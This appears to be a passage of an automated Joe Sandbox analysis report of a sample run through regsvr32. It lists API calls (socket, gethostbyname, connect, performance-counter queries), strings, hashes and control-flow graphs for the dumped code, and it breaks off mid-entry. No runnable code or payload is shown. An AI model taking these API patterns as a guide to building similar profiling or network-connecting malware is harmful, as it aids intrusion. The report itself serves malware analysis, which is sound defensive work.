                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$FreeHeapInfoSystem
                                                                  • String ID: 0$unknownARM x64C:\Users\win10-x64\.cargo\registry\src\index.crates.io-1cd66030c949c28d\sysinfo-0.32.0\src\windows\cpu.rs
                                                                  • API String ID: 1878083305-108933894
                                                                  • Opcode ID: eef4f53fa6d08433e55ed710b7023c77dd1d16fb77e0592ee1f50f1c8283410b
                                                                  • Instruction ID: f3b09253db005477455784e8b308f1bee93df94dfa90360540db53861a880d34
                                                                  • Opcode Fuzzy Hash: eef4f53fa6d08433e55ed710b7023c77dd1d16fb77e0592ee1f50f1c8283410b
                                                                  • Instruction Fuzzy Hash: 5022E371A087009FD3A0DF24C980BABB7E4AF99708F504D2DF88897752D7B1D855CB92
                                                                  APIs
                                                                  • NtQueryInformationProcess.NTDLL ref: 6C8768A8
                                                                  • NtQueryInformationProcess.NTDLL ref: 6C876940
                                                                    • Part of subcall function 6C89A890: GetErrorInfo.OLEAUT32(00000000,00000000,00000000,?,?,6C8768BC,00000000,?,0000003C,00000000), ref: 6C89A8A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: InformationProcessQuery$ErrorInfo
                                                                  • String ID:
                                                                  • API String ID: 2443618835-0
                                                                  • Opcode ID: 4a14874b0578123b135bf6367470ac8cec174dea00645e89a4e4b4a5fade4fc7
                                                                  • Instruction ID: a8c58b96e04eb2e68ca1e28c56473d9a394e018f3c72161dcf3fdca5b39558d7
                                                                  • Opcode Fuzzy Hash: 4a14874b0578123b135bf6367470ac8cec174dea00645e89a4e4b4a5fade4fc7
                                                                  • Instruction Fuzzy Hash: 7281A2B1E00209ABEB308F59CE85BAEB7B8AF15708F148934E914E7641F775DD1487B1
                                                                  APIs
                                                                  • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02633023
                                                                  • recv.WS2_32(?,?,00040000,00000000), ref: 02633044
                                                                    • Part of subcall function 026372CD: __getptd_noexit.LIBCMT ref: 026372CD
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexitrecvselect
                                                                  • String ID:
                                                                  • API String ID: 4248608111-0
                                                                  • Opcode ID: f85c3bd416469113dbdb5450d9eee8e1f3aeaf3aa75b828da6dbeba89133a4a6
                                                                  • Instruction ID: 6cd3c2cada555c20afbb29b33e1f85ba8c27b8abb8f07c1d46794a4cb797570d
                                                                  • Opcode Fuzzy Hash: f85c3bd416469113dbdb5450d9eee8e1f3aeaf3aa75b828da6dbeba89133a4a6
                                                                  • Instruction Fuzzy Hash: C821A3B0E00248ABDB22EF64DC84B9A77B5EF55314F1001E5E515AB3D0D7B0A994CFE5
                                                                  APIs
                                                                  • BCryptGenRandom.BCRYPT(00000000,00000020,?,00000002,00000000,?,?,?,6C8AD9A7,?,?,00000000,?,?,6C8A7D04,?), ref: 6C8ADEA7
                                                                  • SystemFunction036.ADVAPI32(00000020,?,00000000,00000020,?,00000002,00000000,?,?,?,6C8AD9A7,?,?,00000000,?), ref: 6C8ADEB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CryptFunction036RandomSystem
                                                                  • String ID:
                                                                  • API String ID: 1232939966-0
                                                                  • Opcode ID: a72cf556a5df5e0ec72b18827bdd167bdaaab077361702e8cf1df98d307ec36f
                                                                  • Instruction ID: 8540e9f4d83e5db932b49887c37cc21bcf2c7de18a38aae1be3eebfdab0e943e
                                                                  • Opcode Fuzzy Hash: a72cf556a5df5e0ec72b18827bdd167bdaaab077361702e8cf1df98d307ec36f
                                                                  • Instruction Fuzzy Hash: 46E048736022297AEB2015E69DC1FD6BB8DDBA6AE8F114622FE1897590C671CC5601E0

                                                                  Control-flow Graph

                                                                   • Control-flow graph for the function at 6c8e5b50 (graph not rendered; its basic blocks call CloseHandle, WaitForSingleObject, GetLastError and GetExitCodeProcess, the remaining edges are internal calls).
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID: called `Result::unwrap()` on an `Err` value
                                                                  • API String ID: 2962429428-2333694755
                                                                  • Opcode ID: e19651428e5a36827944cc94e7746eeceeeceaa788947510b8d94c2075065365
                                                                  • Instruction ID: 609327311cc722e85ecf3706d192126fbfbd4cd0d185b8e4ab5d5c29c226b191
                                                                  • Opcode Fuzzy Hash: e19651428e5a36827944cc94e7746eeceeeceaa788947510b8d94c2075065365
                                                                  • Instruction Fuzzy Hash: E9C17A70D01319ABDF20DFA4CD44ADEBBB5BF5A308F104629E815BB740E7349985CBA0

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • ResetEvent.KERNEL32(?), ref: 02632D9B
                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02632DA7
                                                                  • timeGetTime.WINMM ref: 02632DAD
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 02632DDA
                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02632E06
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02632E12
                                                                  • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 02632E31
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02632E3D
                                                                  • gethostbyname.WS2_32(00000000), ref: 02632E4B
                                                                  • htons.WS2_32(?), ref: 02632E6D
                                                                  • connect.WS2_32(?,?,00000010), ref: 02632E8B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                  • String ID: 0u
                                                                  • API String ID: 640718063-3203441087
                                                                  • Opcode ID: b85f29f57907a233d42da02ccfcdcc3505e6aced871a4dbc228533796a211d1e
                                                                  • Instruction ID: 673d44ddc6b4b33d098faafccd4fae5d62759e290bc88125e692fe83c61f9100
                                                                  • Opcode Fuzzy Hash: b85f29f57907a233d42da02ccfcdcc3505e6aced871a4dbc228533796a211d1e
                                                                  • Instruction Fuzzy Hash: 49613075A80308ABE720DFA4DC45FAEB7F9FF58B10F504519FA46A72C0D7B0A9448B64

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1665 6c87a960-6c87a97e 1666 6c87aab6-6c87aad2 PdhOpenQueryA 1665->1666 1667 6c87a984-6c87a994 PdhCollectQueryData 1665->1667 1668 6c87aad4-6c87aae3 1666->1668 1669 6c87aaea-6c87aafe call 6c8898f0 call 6c85b180 1666->1669 1670 6c87a996-6c87a9b0 call 6c85b920 1667->1670 1671 6c87a9c9-6c87a9d8 call 6c85bc60 1667->1671 1672 6c87aae5 1668->1672 1673 6c87ab30-6c87ab41 call 6c85b7a0 1668->1673 1700 6c87ae26-6c87ae3c call 6c92c280 1669->1700 1701 6c87ab04-6c87ab2a 1669->1701 1683 6c87a9b6-6c87a9c4 1670->1683 1684 6c87ae15-6c87ae21 call 6c92bc50 1670->1684 1688 6c87aa2e-6c87aa35 1671->1688 1689 6c87a9da-6c87a9e5 1671->1689 1677 6c87ac0a-6c87ac41 1672->1677 1673->1677 1694 6c87ab47-6c87ab58 1673->1694 1686 6c87ac43-6c87ac4a 1677->1686 1687 6c87ac4b-6c87ac62 call 6c85ac30 1677->1687 1683->1671 1684->1700 1705 6c87ae41-6c87ae45 call 6c920620 1687->1705 1706 6c87ac68-6c87acc5 call 6c85ac30 1687->1706 1688->1686 1691 6c87aa3b-6c87aa3f 1688->1691 1695 6c87a9f8-6c87a9fa 1689->1695 1691->1686 1699 6c87aa45-6c87aa5d call 6c85c720 1691->1699 1702 6c87abd5-6c87abee 1694->1702 1703 6c87ab5a-6c87ab6d 1694->1703 1697 6c87a9f0-6c87a9f6 1695->1697 1698 6c87a9fc-6c87aa13 call 6c85b920 1695->1698 1697->1688 1697->1695 1720 6c87ae04-6c87ae10 call 6c92bc50 1698->1720 1721 6c87aa19-6c87aa2c 1698->1721 1724 6c87aa97-6c87aa99 1699->1724 1725 6c87aa5f-6c87aa7b 1699->1725 1700->1705 1701->1673 1701->1677 1702->1677 1710 6c87abf0-6c87ac07 call 6c85ac40 1702->1710 1704 6c87ab7c-6c87ab7f 1703->1704 1711 6c87ab81-6c87ab8e 1704->1711 1712 6c87abab-6c87abbb 1704->1712 1726 6c87ae4a-6c87aec3 call 6c920620 call 6c85ac40 call 6c9459b0 call 6c871120 call 6c9459b0 call 6c92c040 1705->1726 1706->1726 1729 6c87accb-6c87ad08 call 6c87cb00 call 6c85bc60 1706->1729 1710->1677 1718 6c87ab90-6c87aba7 1711->1718 1722 6c87ab70-6c87ab7a 1712->1722 1723 6c87abbd-6c87abd3 call 6c85ac40 1712->1723 1718->1718 1728 6c87aba9 1718->1728 1720->1684 1721->1697 1722->1702 1722->1704 1723->1722 1734 6c87aa9b-6c87aaa7 call 6c85ac40 1724->1734 1735 6c87aaaa-6c87aab1 1724->1735 1732 6c87aa80-6c87aa82 1725->1732 1765 6c87aec5-6c87aec6 call 6c9459b0 1726->1765 1766 6c87aecb-6c87aef0 call 6c85ac40 call 6c9459b0 1726->1766 1728->1712 1747 6c87ad0d-6c87ad12 1729->1747 1732->1724 1738 6c87aa84-6c87aa95 1732->1738 1734->1735 1735->1686 1738->1724 1738->1732 1749 6c87adeb-6c87adf9 1747->1749 1750 6c87ad18-6c87ad2d 1747->1750 1749->1667 1752 6c87adff 1749->1752 1753 6c87ad30-6c87ade5 call 6c921760 * 2 call 6c87cb00 1750->1753 1752->1686 1753->1749 1765->1766 1772 6c87af02-6c87af13 call 6c87e170 1766->1772 1773 6c87aef2 1766->1773 1779 6c87af26-6c87af5f call 6c87a960 1772->1779 1780 6c87af15-6c87af23 call 6c85ac40 1772->1780 1773->1772 1774 6c87aef4-6c87aeff call 6c85ac40 1773->1774 1774->1772 1780->1779
                                                                  APIs
                                                                  • PdhCollectQueryData.PDH(?), ref: 6C87A98A
                                                                    • Part of subcall function 6C85B920: memcmp.MSVCRT(?,00000030,5F28726F), ref: 6C85B9F0
                                                                    • Part of subcall function 6C85B920: PdhGetFormattedCounterValue.PDH(00000030,00000200,00000000,?), ref: 6C85BA55
                                                                  • PdhOpenQueryA.PDH(00000000,00000000,00000000), ref: 6C87AAC7
                                                                  Strings
                                                                  • cess, xrefs: 6C87AC9D
                                                                  • global_key_idle disappearedC:\Users\win10-x64\.cargo\registry\src\index.crates.io-1cd66030c949c28d\sysinfo-0.32.0\src\windows\system.rs, xrefs: 6C87AE1C
                                                                  • cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs, xrefs: 6C87AE37
                                                                  • l)\%, xrefs: 6C87AC88
                                                                  • e Ti, xrefs: 6C87AC7A
                                                                  • Tota, xrefs: 6C87AC8F
                                                                  • or(_, xrefs: 6C87AC96
                                                                  • Idl, xrefs: 6C87AC81
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Query$CollectCounterDataFormattedOpenValuememcmp
                                                                  • String ID: Idl$Tota$cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs$cess$e Ti$global_key_idle disappearedC:\Users\win10-x64\.cargo\registry\src\index.crates.io-1cd66030c949c28d\sysinfo-0.32.0\src\windows\system.rs$l)\%$or(_
                                                                  • API String ID: 3579676406-1093267101
                                                                  • Opcode ID: c40792008926a886f1f3f44d182e0a3fa26a1716ee18c2ebdc00df2a96f66c86
                                                                  • Instruction ID: 538d5d75a9f996407671e02ca933dc7f4e98c2b5e8f591e2a8731749345aa4a8
                                                                  • Opcode Fuzzy Hash: c40792008926a886f1f3f44d182e0a3fa26a1716ee18c2ebdc00df2a96f66c86
                                                                  • Instruction Fuzzy Hash: 2C02F471905305AFD720CF14C980BABBBE0BF95708F148A2DF89857791E771E958CBA2

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID:
                                                                  • API String ID: 3702945584-0
                                                                  • Opcode ID: f26be120ee58e6dbfe7adb4fd79cca90671ce8336a37477147a5edaeff0c80bc
                                                                  • Instruction ID: 0018c5b46947ea84774c7ea058d9ee126c30fc6f7f08d4e99c0c36bc33b9a03c
                                                                  • Opcode Fuzzy Hash: f26be120ee58e6dbfe7adb4fd79cca90671ce8336a37477147a5edaeff0c80bc
                                                                  • Instruction Fuzzy Hash: 8D3137B1A093009FEB00AF69D58831ABFF8EB55314F10856AE894C7346E775C558CF92

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2128 6c8f2f20-6c8f2f48 call 6c8f3180 2131 6c8f2f5a-6c8f2f8f call 6c8f3180 2128->2131 2132 6c8f2f4a-6c8f2f55 CloseHandle 2128->2132 2136 6c8f2f9b-6c8f2fc8 2131->2136 2137 6c8f2f91-6c8f2f96 2131->2137 2133 6c8f3139-6c8f3140 2132->2133 2139 6c8f2fd0-6c8f2fe2 WaitForMultipleObjects 2136->2139 2138 6c8f3131-6c8f3134 call 6c8b0de0 2137->2138 2138->2133 2140 6c8f2fe4-6c8f2fe6 2139->2140 2141 6c8f3020-6c8f3025 2139->2141 2143 6c8f2fec-6c8f2ff1 2140->2143 2144 6c8f311b-6c8f3123 GetLastError 2140->2144 2145 6c8f302b-6c8f302e 2141->2145 2146 6c8f30d3-6c8f30d8 call 6c8f3220 2141->2146 2147 6c8f2ff3-6c8f2ff6 2143->2147 2148 6c8f3072-6c8f3076 call 6c8f3220 2143->2148 2149 6c8f3126 2144->2149 2150 6c8f3038-6c8f3051 GetOverlappedResult 2145->2150 2151 6c8f3030-6c8f3033 2145->2151 2159 6c8f30dd-6c8f30e8 2146->2159 2153 6c8f3058 2147->2153 2154 6c8f2ff8-6c8f3011 GetOverlappedResult 2147->2154 2169 6c8f307b-6c8f3086 2148->2169 2155 6c8f3129-6c8f312c call 6c8b0de0 2149->2155 2157 6c8f30a8-6c8f30b2 GetLastError 2150->2157 2158 6c8f3053-6c8f3056 2150->2158 2156 6c8f30c0-6c8f30d1 2151->2156 2166 6c8f305b-6c8f306c 2153->2166 2161 6c8f3013-6c8f3016 2154->2161 2162 6c8f3092-6c8f309c GetLastError 2154->2162 2155->2138 2156->2146 2165 6c8f310f-6c8f3119 call 6c8f3310 2156->2165 2157->2156 2164 6c8f30b4-6c8f30b7 2157->2164 2158->2156 2167 6c8f30ea-6c8f30ec 2159->2167 2168 6c8f30f4-6c8f310a 2159->2168 2161->2166 2162->2166 2171 6c8f309e-6c8f30a1 2162->2171 2172 6c8f30bd 2164->2172 2173 6c8f3141-6c8f314a 2164->2173 2165->2155 2166->2148 2174 6c8f310c 2166->2174 2167->2139 2175 6c8f30f2 2167->2175 2168->2155 2169->2168 2176 6c8f3088-6c8f308a 2169->2176 2171->2166 2179 6c8f30a3 2171->2179 2172->2156 2173->2149 2174->2165 2175->2165 2176->2139 2177 6c8f3090 2176->2177 2177->2174 2179->2173
                                                                  APIs
                                                                    • Part of subcall function 6C8F3180: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,00000000,?,6C8F2F39,?), ref: 6C8F3192
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8F2F50
                                                                    • Part of subcall function 6C8B0DE0: CloseHandle.KERNEL32(?,000000FF), ref: 6C8B0DF3
                                                                    • Part of subcall function 6C8B0DE0: CloseHandle.KERNEL32(?,?,000000FF), ref: 6C8B0DFB
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle$CreateEvent
                                                                  • String ID:
                                                                  • API String ID: 1371578007-0
                                                                  • Opcode ID: b691043e6636398c8592cb971b62441a41bdf871ac5afe1d16dd0f59f36987b2
                                                                  • Instruction ID: 9c93f44e1e1ac6c4aa023592a6554434b2570ba0dc1f82e9a669eb13f4823410
                                                                  • Opcode Fuzzy Hash: b691043e6636398c8592cb971b62441a41bdf871ac5afe1d16dd0f59f36987b2
                                                                  • Instruction Fuzzy Hash: 52615FB0E04658DBDB20CFA9C9806DEBBB5BF49354F14492AE825B7740DB309C46CB22

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2180 26373db-26373e9 2181 26373eb-26373fd call 26372cd call 26387f3 2180->2181 2182 26373ff-2637417 call 2639878 call 263a0e4 2180->2182 2191 2637477-263747a 2181->2191 2192 2637462-263746b call 2637009 2182->2192 2193 2637419-263743b call 2639a33 call 2639906 2182->2193 2198 2637474 2192->2198 2199 263746d-2637473 call 26372f3 2192->2199 2205 2637440-2637458 CreateThread 2193->2205 2206 263743d 2193->2206 2202 2637476 2198->2202 2199->2198 2202->2191 2205->2202 2207 263745a-2637460 GetLastError 2205->2207 2206->2205 2207->2192
                                                                  APIs
                                                                  • ___set_flsgetvalue.LIBCMT ref: 02637400
                                                                  • __calloc_crt.LIBCMT ref: 0263740C
                                                                  • __getptd.LIBCMT ref: 02637419
                                                                  • CreateThread.KERNEL32(?,?,02637376,00000000,?,?), ref: 02637450
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 0263745A
                                                                  • _free.LIBCMT ref: 02637463
                                                                  • __dosmaperr.LIBCMT ref: 0263746E
                                                                    • Part of subcall function 026372CD: __getptd_noexit.LIBCMT ref: 026372CD
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                  • String ID:
                                                                  • API String ID: 155776804-0
                                                                  • Opcode ID: 0816edfaef114579a8d274e086a4b358523922ee63e3b854c520e58ef16615d3
                                                                  • Instruction ID: cd547a6a01a16bcd3a0f1fef80dd357da591227a7e954de1422035d9bfadfaed
                                                                  • Opcode Fuzzy Hash: 0816edfaef114579a8d274e086a4b358523922ee63e3b854c520e58ef16615d3
                                                                  • Instruction Fuzzy Hash: 3C114872540386AFE713AFB4DC40E9FBBDAEF05374B00442DF96486241DB71E4008EA4

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • ___set_flsgetvalue.LIBCMT ref: 0263737C
                                                                    • Part of subcall function 02639878: TlsGetValue.KERNEL32(?,02637381), ref: 02639881
                                                                    • Part of subcall function 02639878: RtlDecodePointer.NTDLL ref: 02639893
                                                                    • Part of subcall function 02639878: TlsSetValue.KERNEL32(00000000,?,02637381), ref: 026398A2
                                                                  • ___fls_getvalue@4.LIBCMT ref: 02637387
                                                                    • Part of subcall function 02639858: TlsGetValue.KERNEL32(?,?,0263738C,00000000), ref: 02639866
                                                                  • ___fls_setvalue@8.LIBCMT ref: 0263739A
                                                                    • Part of subcall function 026398AC: RtlDecodePointer.NTDLL(?), ref: 026398BD
                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 026373A3
                                                                  • RtlExitUserThread.NTDLL(00000000), ref: 026373AA
                                                                  • GetCurrentThreadId.KERNEL32 ref: 026373B0
                                                                  • __freefls@4.LIBCMT ref: 026373D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value$DecodePointerThread$CurrentErrorExitLastUser___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                  • String ID:
                                                                  • API String ID: 2876972746-0
                                                                  • Opcode ID: fec77024fecd0786212b5332df6c86302f8fadd4361f6e31e833a559b1c06ee3
                                                                  • Instruction ID: f8ec2dbbc8de401f76843818fd3c2daf99b914e13d071a2f74d0ddf5757602f7
                                                                  • Opcode Fuzzy Hash: fec77024fecd0786212b5332df6c86302f8fadd4361f6e31e833a559b1c06ee3
                                                                  • Instruction Fuzzy Hash: 94F03AB8541644ABD70ABF71C94894EBBEAEF88340350C85CE8468B311DB74E8428FA9

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 026383D2: _doexit.LIBCMT ref: 026383DE
                                                                  • ___set_flsgetvalue.LIBCMT ref: 0263737C
                                                                    • Part of subcall function 02639878: TlsGetValue.KERNEL32(?,02637381), ref: 02639881
                                                                    • Part of subcall function 02639878: RtlDecodePointer.NTDLL ref: 02639893
                                                                    • Part of subcall function 02639878: TlsSetValue.KERNEL32(00000000,?,02637381), ref: 026398A2
                                                                  • ___fls_getvalue@4.LIBCMT ref: 02637387
                                                                    • Part of subcall function 02639858: TlsGetValue.KERNEL32(?,?,0263738C,00000000), ref: 02639866
                                                                  • ___fls_setvalue@8.LIBCMT ref: 0263739A
                                                                    • Part of subcall function 026398AC: RtlDecodePointer.NTDLL(?), ref: 026398BD
                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 026373A3
                                                                  • RtlExitUserThread.NTDLL(00000000), ref: 026373AA
                                                                  • GetCurrentThreadId.KERNEL32 ref: 026373B0
                                                                  • __freefls@4.LIBCMT ref: 026373D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value$DecodePointerThread$CurrentErrorExitLastUser___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                  • String ID:
                                                                  • API String ID: 811752470-0
                                                                  • Opcode ID: 52f955a77cda6ee3d85607626bb12db13f9d038e95c19b838b26b6b59c27f4c0
                                                                  • Instruction ID: 94ecb72782484b4e6e624e5d1b8f95e4348a59825d7f7a34d4827ef85bbd0b6a
